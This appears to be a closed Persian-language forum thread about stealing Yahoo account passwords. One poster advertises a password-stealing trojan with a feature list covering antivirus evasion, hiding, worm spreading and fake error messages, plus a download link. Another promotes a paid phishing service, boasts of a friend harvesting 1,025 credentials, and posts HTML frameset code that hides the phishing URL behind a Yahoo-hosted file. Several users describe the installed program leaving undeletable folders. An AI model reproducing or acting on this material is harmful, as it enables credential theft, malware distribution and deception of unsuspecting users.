برگزیده های پرشین تولز

پیدا کردن رمز یاهو در 3 سوت

وضعیت
موضوع بسته شده است.

Mehdi

مدیر بازنشسته
لایک‌ها
49
هيچ وقت يادم نميره
منم دوسال پيش يه پي اس نوشتم اومدم همينجا پست دادم ولي بجاي استقبال پشت سرم كلي حرف در اوردن نميدونم برو بچ مسن يادشون مياد يا نه:happy:
البته من برا اينكه ثابت كنم هيچ كلكي تو كارم نبوده اومدم سورسشو مجاني گزاشتم:blush:
بهر حال هيچ وقت به برنامه هاي اجرايي نميشه اطمينان كرد از كجا معلوم يه نسخه از پسورد رو برا خود نويسنده نميفرسته
بهر حال اگه كسي پي اس ميخواد ميتونم بهترين پي اس تو اين زمان رو بهتون معرفي كنم
نميدونم ميدونيد يا نه ولي پي اس هاي معمولي خيلي راحت با يه روش ساد ميشه پيچوندشون
اينم امكانات :
۱-قابلیت بسیار قدرتمند این نسخه فرستادن نام - یوزرنیم - شماره تلفن - رمز اکانت دیال آپ طرف بلافاصله بعد از کانکت شدن با اون اکانته .

۲-قالبیت بسیار جالب دیگه ی اون کار کردن در کافی نت هاست.

۳-و میل هاش هم بسیار قشنگه

و قابلیت ها دیگش :

1-فرستادن پسورد به 2 صورت : الف - به E-mail شخص می فرسته . ب-از روش ارسال به یک صفحه ی پویای وب (مثل Asp یا Php ) پسورد رو می فرسته

2-رد شدن از فایروال که برای اینکار از مکانیزم های بسیار پر قدرتی که خودم کشفشون کردم استفاده می کنه .

3- فابلیت غیر فعال کردن فایروال و آنتی ویروس .

4- عدم شناخته شدن توسط آنتی ویروس.

5-حجم بسیار کم (1۶.۵ کیلو بایت ) .

6-فرستادن پسورد بدون تغییر توپی .

7-فرستادن پسورد به روش OnTime طوری که بعد از اینکه ویروس تو کامپیوتر هدف اجرا شد اگه یاهومسنجر آنلاین باشه بلافاصله پسورد و آی دی رو می فرسته .

8-ارسال یوزرنیم ویندوز.

9-مخفی موندن در TaskManager .

10- استارت آپ مخفی در Msconfig

11-غیر فعال فعال کردن Msconfig .

12- غیر فعال کردن Registry .

13-غیر فعال کردن Save Password در یاهو مسنجر .

14-کار کرد در یاهو مسنجرها 5 و 6 و 7 هم فول وهم بتا!!!

15-پیغام خطای قلابی .

16-امکان انتخاب آیکون فایل .

17-کارکرد سرور با پسوندهای exe,bat,scr,pif,cmd

18-امکان تبدیل شدن به یک Worm که خودش رو در فلاپی ها کپی می کنه . از این ویژگی که یکی از جالبترین فابلیت ها این پسورد سندر هست می شه تو تایپ و تکثیری ها استفاده کرد .

19 - یک امکان بسیار جالب این Password Sender این هست که اگه دو تا سرور با E-mail های مختلف تو یک کامپیوتر باشن بطور کامل کار می کنن ! .

20- قابلیت خیلی ابتکاری و جالب دیگه ی Toxic-Ps 2.2 اینه که شما می تونید در قسمت های E-mail و Through a link و اسم ورم از user% و pass% استفاده کنید . مثلا اگه این رو تو قسمت E-mail بنویسید :[email protected]% یوزر نیم و پسورد ها به E-mail کسی که هک شده فرستاده می شه . بطور کلی user% بيانگر يوزرنيم ID کسی هست که هک شده و pass% هم بيانگر رمز ID کسی هست که هک شده .

۲۱- و کار کردن در سيستم های Limited

۲۲-فرستادن پسورد به صورت Alt

۲۳-مشخص بودن فاصله ها در پسورد فرستاده شده .

اينم لينك دانلود
۱-قابلیت بسیار قدرتمند این نسخه فرستادن نام - یوزرنیم - شماره تلفن - رمز اکانت دیال آپ طرف بلافاصله بعد از کانکت شدن با اون اکانته .

و قابلیت ها دیگش :

1-فرستادن پسورد به 2 صورت : الف - به E-mail شخص می فرسته . ب-از روش ارسال به یک صفحه ی پویای وب (مثل Asp یا Php ) پسورد رو می فرسته

2-رد شدن از فایروال که برای اینکار از مکانیزم های بسیار پر قدرتی که خودم کشفشون کردم استفاده می کنه .

7-فرستادن پسورد به روش OnTime طوری که بعد از اینکه ویروس تو کامپیوتر هدف اجرا شد اگه یاهومسنجر آنلاین باشه بلافاصله پسورد و آی دی رو می فرسته .

8-ارسال یوزرنیم ویندوز.

15-پیغام خطای قلابی .

18-امکان تبدیل شدن به یک Worm که خودش رو در فلاپی ها کپی می کنه . از این ویژگی که یکی از جالبترین فابلیت ها این پسورد سندر هست می شه تو تایپ و تکثیری ها استفاده کرد .

19 - یک امکان بسیار جالب این Password Sender این هست که اگه دو تا سرور با E-mail های مختلف تو یک کامپیوتر باشن بطور کامل کار می کنن ! .

20- قابلیت خیلی ابتکاری و جالب دیگه ی Toxic-Ps 2.2 اینه که شما می تونید در قسمت های E-mail و Through a link و اسم ورم از user% و pass% استفاده کنید . مثلا اگه این رو تو قسمت E-mail بنویسید :[email protected]% یوزر نیم و پسورد ها به E-mail کسی که هک شده فرستاده می شه . بطور کلی user% بيانگر يوزرنيم ID کسی هست که هک شده و pass% هم بيانگر رمز ID کسی هست که هک شده .

Mehdi

مدیر بازنشسته
لایک‌ها
49
هيچ وقت يادم نميره
منم دوسال پيش يه پي اس نوشتم اومدم همينجا پست دادم ولي بجاي استقبال پشت سرم كلي حرف در اوردن نميدونم برو بچ مسن يادشون مياد يا نه:happy:
البته من برا اينكه ثابت كنم هيچ كلكي تو كارم نبوده اومدم سورسشو مجاني گزاشتم:blush:
بهر حال هيچ وقت به برنامه هاي اجرايي نميشه اطمينان كرد از كجا معلوم يه نسخه از پسورد رو برا خود نويسنده نميفرسته
بهر حال اگه كسي پي اس ميخواد ميتونم بهترين پي اس تو اين زمان رو بهتون معرفي كنم
نميدونم ميدونيد يا نه ولي پي اس هاي معمولي خيلي راحت با يه روش ساد ميشه پيچوندشون
اينم امكانات :

و قابلیت ها دیگش :

8-ارسال یوزرنیم ویندوز.

15-پیغام خطای قلابی .

اينم لينك دانلود
http://toxic-ware.com/main/default.asp?mode=DownloadPage&id=27

Moein

Registered User
لایک‌ها
64
به نقل از pinokio :
اي كه گفتي يعني چه؟كجا دانلود كنيم + طرز كار و قابليتهاممنون
مزیت‌های این روش :

لازم نیست شما یه فایل مشکوک رو دانلود کنی که حتی اگه از اول هم ویروسی نباشه ممکنه توسط کسی که اونو برای دانلود گذاشته با یک ویروس بایند شده باشه.

بعد طرز کارش رو یاد بگیری و یک سری تنطیمات انجام بدی و یک فایل جدید ایجاد کنی و یا یکجایی آپلوش کنی یا برای طرف ایمیلش بکنی.

و مهمتر از همه طرف بیاد به بهانه دیدن یک عکس یه فایل با پسوند exe رو دانلود کنه !

حالا تازه دعا کن آنتی‌ویروسش اونو پاک نکنه یا با فایروال مشکل پیدا نکنه و ببینی برنامه ایمیل می‌زنه یا نه.

ممکنه آنتی‌ویروس موقتاً اونو نشناسه ولی خیلی زود یه آدم بی‌کار مثلاً فایل تروجان رو تو سایت symantec به عنوان ویروس submit می‌کنه.

ولی در مورد فیک پیج :

شما نیاز به دانلود هیچ برنامه‌ای ندارید.

نیاز به هیچ تنظیماتی ندارید.

نیاز به آپلود یا ایمیل کردن هیچ فایلی برای طرف ندارید.

هیچ آنتی‌ویروس و فایروالی هرگز نمی‌تونه فیک پیج رو تشخیص بده.

به محض لاگین کردن طرف ایمیل به شما ارسال می‌شه.

فقط کافی طرف توی لینکی که بهش دادین لاگین بکنه.

Moein

Registered User
لایک‌ها
64
به نقل از ♂MAJID :
مثلا یه صفحه به جای login yahoo خودمون درست کنیم و ادرسش بفرستیم واسه طرف .فکر کنم اینه

کسی فکر نکنم این قدر احمق باشه برهloginکنه:happy:

درسته ،یک صفحه شبیه لاگین یاهو

مطمئن باش کسایی که روی یک لینک طولانی که کسی حال خوندنش رو نداره و 90 درصد شبیه لینک خود یاهو هست کلیک می‌کنند بیشتر از کسایی که برای دیدن یک عکس یک فایل exe رو دانلود و اجرا می‌کنند.

چند ماه پیش یه فیک پیج درست کردم و لینکش رو به یکی از دوستام دادم که می‌خواست چند نفر رو هک کنه ،
تا الان یوزر و پسورد 1025 نفر رو گیر آورده و هر روز داره بیشتر هم می‌شه.
تازه قیافه فیک پیجش هنوز یاهوی قدیمیه !

Moein

Registered User
لایک‌ها
64
کافی در سایت http://webtools.mywebs.ir ثبت نام کنید و یک لینک اختصاصی به شما داده می‌شه.
Username و Password هر کی توی اون لینک لاگین کنه به ایمیلی که موقع ثبت نام دادین ایمیل می‌شه.

فیک پیج فقط یکی از خدمات این سایته.
شما می‌تونید از طریق قسمت http://fms.mywebs.ir ایمیلی شامل یه لینک مثل
http://login.us.a1.rd.photo.mail.yahoo.com
به صورت ناشناس یا از طرف یکی از دوستای طرف براش بفرستید یا می‌تونید موقع چت لینک رو بهش بدید.

مثلاً لینک زیر لینک فیک پیج منه :
http://login.us.a1.rd.photo.mail.yahoo.mywebs.ir/?rd=1001

فیک پیج مزایای دیگه‌ای هم داره مثلاً لازم نیست مثل ps چند وقت یکبار یک فایل جدید برای آپ‌دیت دانلود کنید چون سایت با تغییرات یاهو خودش رو بروز می‌کنه.
یا مثلاً می‌شه فیک پیج صفحه confirm یاهو رو درست کرد تا Password یک آی‌دی مشخص رو گیر آورد.

یکی رو میشناسم که یه ps رو 5000 تومان می‌فروشه و تا حالا بیشتر از 100 تاشو فروخته !
حالا خودتون مقایسه کنید ps بیشتر می‌ارزه یا فیک پیج که تازه یکی از 3 قسمت سایتی هست که عضوش می‌شید
در حالی که هزینه عضویت این سایت سالی فقط 3000 تومان هست و با معرفی هر نفر 500 تومان هم پورسانت می‌گیرید !

اینم لینک عضویت :
http://webtools.mywebs.ir/register.php?ref=moein

mostafa_gm

Registered User
لایک‌ها
438
هر دو تا روش یه عیب بزرگ دارن.
password sender که باید حتما یکی دانلودش کنه و اجراش کنه که خیلی احتمالش کمه.
fake login هم تو address bar تابلوئه که صفحه یاهو نیست. هر کی یه نگاه بندازه میفهمه.

♂MAJID

کاربر تازه وارد
لایک‌ها
2
به نقل از moein :
درسته ،یک صفحه شبیه لاگین یاهو

مطمئن باش کسایی که روی یک لینک طولانی که کسی حال خوندنش رو نداره و 90 درصد شبیه لینک خود یاهو هست کلیک می‌کنند بیشتر از کسایی که برای دیدن یک عکس یک فایل exe رو دانلود و اجرا می‌کنند.

چند ماه پیش یه فیک پیج درست کردم و لینکش رو به یکی از دوستام دادم که می‌خواست چند نفر رو هک کنه ،
تا الان یوزر و پسورد 1025 نفر رو گیر آورده و هر روز داره بیشتر هم می‌شه.
تازه قیافه فیک پیجش هنوز یاهوی قدیمیه !
من یه سوال دارم این ایدی هایی که زدی به چه دردی میخوره؟
دوما ایا توشون ایلگال هست ؟ نه نیست چون ایدی چند تا تازه وارد و زدی :D
به نظر من بهترین روش crack کردن ایدی باشه:happy:

mahdi206

Registered User
لایک‌ها
5
من اين برنامه رو يه بار براي امتحان نصب كردم. حالا كه uninstall كردمش نه خود folder برنامه رو ميتونم پاك كنم نه program folder اش داخل start menu :blink:
جالب اينه كه داخل اين فولدرها ميتونم فايل كپي كنم ولي نه ميتونم فولدرها رو پاك كنم نه ميتونم rename اش كنم! يه چيز جالب اينه كه آخر اسم فولدرها يه دونه space داره!!:wacko:

Persianit

Registered User
لایک‌ها
16
به نقل از mahdi206 :
من اين برنامه رو يه بار براي امتحان نصب كردم. حالا كه uninstall كردمش نه خود folder برنامه رو ميتونم پاك كنم نه program folder اش داخل start menu :blink:
جالب اينه كه داخل اين فولدرها ميتونم فايل كپي كنم ولي نه ميتونم فولدرها رو پاك كنم نه ميتونم rename اش كنم! يه چيز جالب اينه كه آخر اسم فولدرها يه دونه space داره!!:wacko:

منم این مشکلو دارم. خیلی عجیبه!!!!!111

Pac_ginobat

Registered User
لایک‌ها
10
من معمولا Safe Mode که میام بالا میتونم خیلی کارا کنم
شما هم یه نگاه بنداز مهدی

LEGOLAS

کاربر تازه وارد
لایک‌ها
1
به نقل از Pac_ginobat :
من معمولا Safe Mode که میام بالا میتونم خیلی کارا کنم
شما هم یه نگاه بنداز مهدی

من هم همین مشکل رو دارم. در ضمن با safe mode هم امتحان کردم ولی نتیجه نداد...:blink:
این هم یه عکس از Error!:p :p
در ضمن ایرادی که این برنامه داره ، همون پسوند exe برای تروجانه! فکر می کنم فقط تازه کارا و مبتدی ها فایلهای exe ناشناس رو باز کنن ، چون به هر حال کسی که یه کم آشنایی با کامپیوتر داشته باشه می دونه که پسوند عکس ، JPG یا BMP یا GIF می تونه باشه نه exe ! در ضمن فکر نمی کنم اینقدر ریسک بکنه که یه فایل exe رو همین طوری بدون دلیل باز بکنه!!!:D
من چند وقت پیش یه برنامه رو داشتم تست می کردم که اون هم طرز کارش تقریبا مثل همین برنامه بود ولی موقع Save کردن تروجان در آخر کار، می شد که پسوند فایل رو عوض کرد.البته الان یادم نیست که اسم برنامه چی بود.
در موردfake page هم فکر می کنم اگه سورس اونو نگاه کنن می فهمن که از طرف یاهو هست یا نه!

فایل های ضمیمه

• 1.jpg
    1.jpg
    23.5 KB · نمایش ها: 45

Pac_ginobat

Registered User
لایک‌ها
10
احتمالا 2 تا ويندوز نداري؟؟؟؟:D

با دوومي بياي بالا پاكش كني؟؟؟؟

mahdi206

Registered User
لایک‌ها
5
من رفتم با recovery console پدرش رو در بيارم ولي نذاشت! نامرد از اونجا نميشه داخل program files رفت. ميگه access is denied
113.gif

حالا من چيكار كنم؟ من ترسيده بيدم! اين فولدر مشكوك بيد!

mostafa_gm

Registered User
لایک‌ها
438
این صد در صد مورد داره.
من که همیشه میگم یارو واسه رضای خدا نمیشینه اینهمه وقت بذاره برنامه بنویسه بعد مجانی بده دست ملت واسه همین هیچ وقت از این برنامه های به ظاهر مجانی رو کامپیوترم اجرا نمیکنم.

mahdi206

Registered User
لایک‌ها
5
حالا يكي يه راهي بگه ما اين فولدر رو بتونيم پاك كنيم! جلوي عالم و آدم ضايع شديم رفت! همه فهميدن ما روي كامپيوتر اين برنامه رو نصب كرديم ديگه پسورد نميزنن روي سيستمم!

DJ_DC

کاربر تازه وارد
لایک‌ها
0
به نقل از moein :
کافی در سایت http://webtools.mywebs.ir ثبت نام کنید و یک لینک اختصاصی به شما داده می‌شه.
Username و Password هر کی توی اون لینک لاگین کنه به ایمیلی که موقع ثبت نام دادین ایمیل می‌شه.

به صورت ناشناس یا از طرف یکی از دوستای طرف براش بفرستید یا می‌تونید موقع چت لینک رو بهش بدید.

فیک پیج مزایای دیگه‌ای هم داره مثلاً لازم نیست مثل ps چند وقت یکبار یک فایل جدید برای آپ‌دیت دانلود کنید چون سایت با تغییرات یاهو خودش رو بروز می‌کنه.
یا مثلاً می‌شه فیک پیج صفحه confirm یاهو رو درست کرد تا Password یک آی‌دی مشخص رو گیر آورد.

یکی رو میشناسم که یه ps رو 5000 تومان می‌فروشه و تا حالا بیشتر از 100 تاشو فروخته !
حالا خودتون مقایسه کنید ps بیشتر می‌ارزه یا فیک پیج که تازه یکی از 3 قسمت سایتی هست که عضوش می‌شید
در حالی که هزینه عضویت این سایت سالی فقط 3000 تومان هست و با معرفی هر نفر 500 تومان هم پورسانت می‌گیرید !

اینم لینک عضویت :

این سایت کار خودته:D

Benyaminj

کاربر فعال بازیهای کامپیوتری
کاربر فعال
لایک‌ها
1,888
به نقل از moein :

اینم لینک عضویت :

ببين چه کارو کاسبی راه انداختها...بابا ايين کارارو ما 3&4 سال پيش
انجام میداديم...تمام ايين کارهارو خودتون به راحتی ميتونيد انجام
بديد..مثلاً همين ساختن فيک پيج...به راهتی با يه جستجوی ساده ميتونيد
آموزش ساختن فيک پجو پييدا بکنيد....
يا اميل زدن با هر نامی....
حتی ميتونيد تحت داس اين عملياتو انجام بديد....اگر دوستان احتياج به راهنمايی
دارن...من در خدمتتون هستم..........

mostafa_gm

Registered User
لایک‌ها
438
به نقل از mahdi206 :
حالا يكي يه راهي بگه ما اين فولدر رو بتونيم پاك كنيم! جلوي عالم و آدم ضايع شديم رفت! همه فهميدن ما روي كامپيوتر اين برنامه رو نصب كرديم ديگه پسورد نميزنن روي سيستمم!
این حتما یه process ی چیزی داره اجرا میکنه.

Moein

Registered User
لایک‌ها
64
به نقل از mostafa_gm :
هر دو تا روش یه عیب بزرگ دارن.
password sender که باید حتما یکی دانلودش کنه و اجراش کنه که خیلی احتمالش کمه.
fake login هم تو address bar تابلوئه که صفحه یاهو نیست. هر کی یه نگاه بندازه میفهمه.
بله ، ولی بد نیست مشکل فک پیج رو دوباره با ایرادهای password sender مقایسه کنید.
اگه مشکل فیک پیج فقط اینه که نباید طرف نگاهش به قسمت نزدیک به آخر آدرس بار بیافته ،
ps از دانلود برنامه توسط شما گرفته تا ارسال ایمیل مشکل داره !

من فقط این دو روش رو با هم مقایسه کردم و می‌گم برای کسی که می‌خواد از ps استفاده کنه ، فیک پیج انتخاب خیلی بهتریه
چون فکر نمی‌کنم لاگین کردن توی یک صفحه عین یاهو مشکوک‌تر از دانلود و اجرای یک فایل exe باشه
و یا روشی راحتتر از کپی کردن یک لینک برای هک کردن طرف پیدا بشه.

علاوه بر این‌ها خیلی روشها برای مطمئن شدن از بابت آدرس لینک وجود داره مثلاً

آخر لینک یه سری پارامتر اضافه بزاری تا لینک طولانی بشه و اسم اصلی سایت که اون وسطه به چشم نیاد(مثل : &rb=Inbox&reset=1&&Idx=1YY=10658&inc=200&order=down&sort=date&pos=0&view=a&head=b)

یک فایل html با این کد
HTML:
<html>
<head>
<title>Sign in to Yahoo!</title>
</head>
<frameset framespacing="0" border="0" frameborder="0" rows="*">
  <frame marginwidth="0" marginheight="0" scrolling="auto" src="http://login.us.a1.rd.photo.mail.yahoo.mywebs.ir/?rd=1001">
  <noframes>
  <body>
  </body>
  </noframes>
</frameset>
</html>
توی briefcase یاهو آپلود کنی و همون موقع لینک فایل html رو بدی به طرف که در این صورت دیگه حتی اگه لینک رو زیر و رو هم بکنه طرف شک نمی‌کنه چون لینک مال خود سایت یاهو هست !

چند تا روش دیگه هم هست ولی من همینا رو پیشنهاد می‌کنم.

ضمناً خودت چند بار تا حالا لینک‌های شلوغ یاهو رو آنالیز کردی ؟!

وضعیت
موضوع بسته شده است.
بالا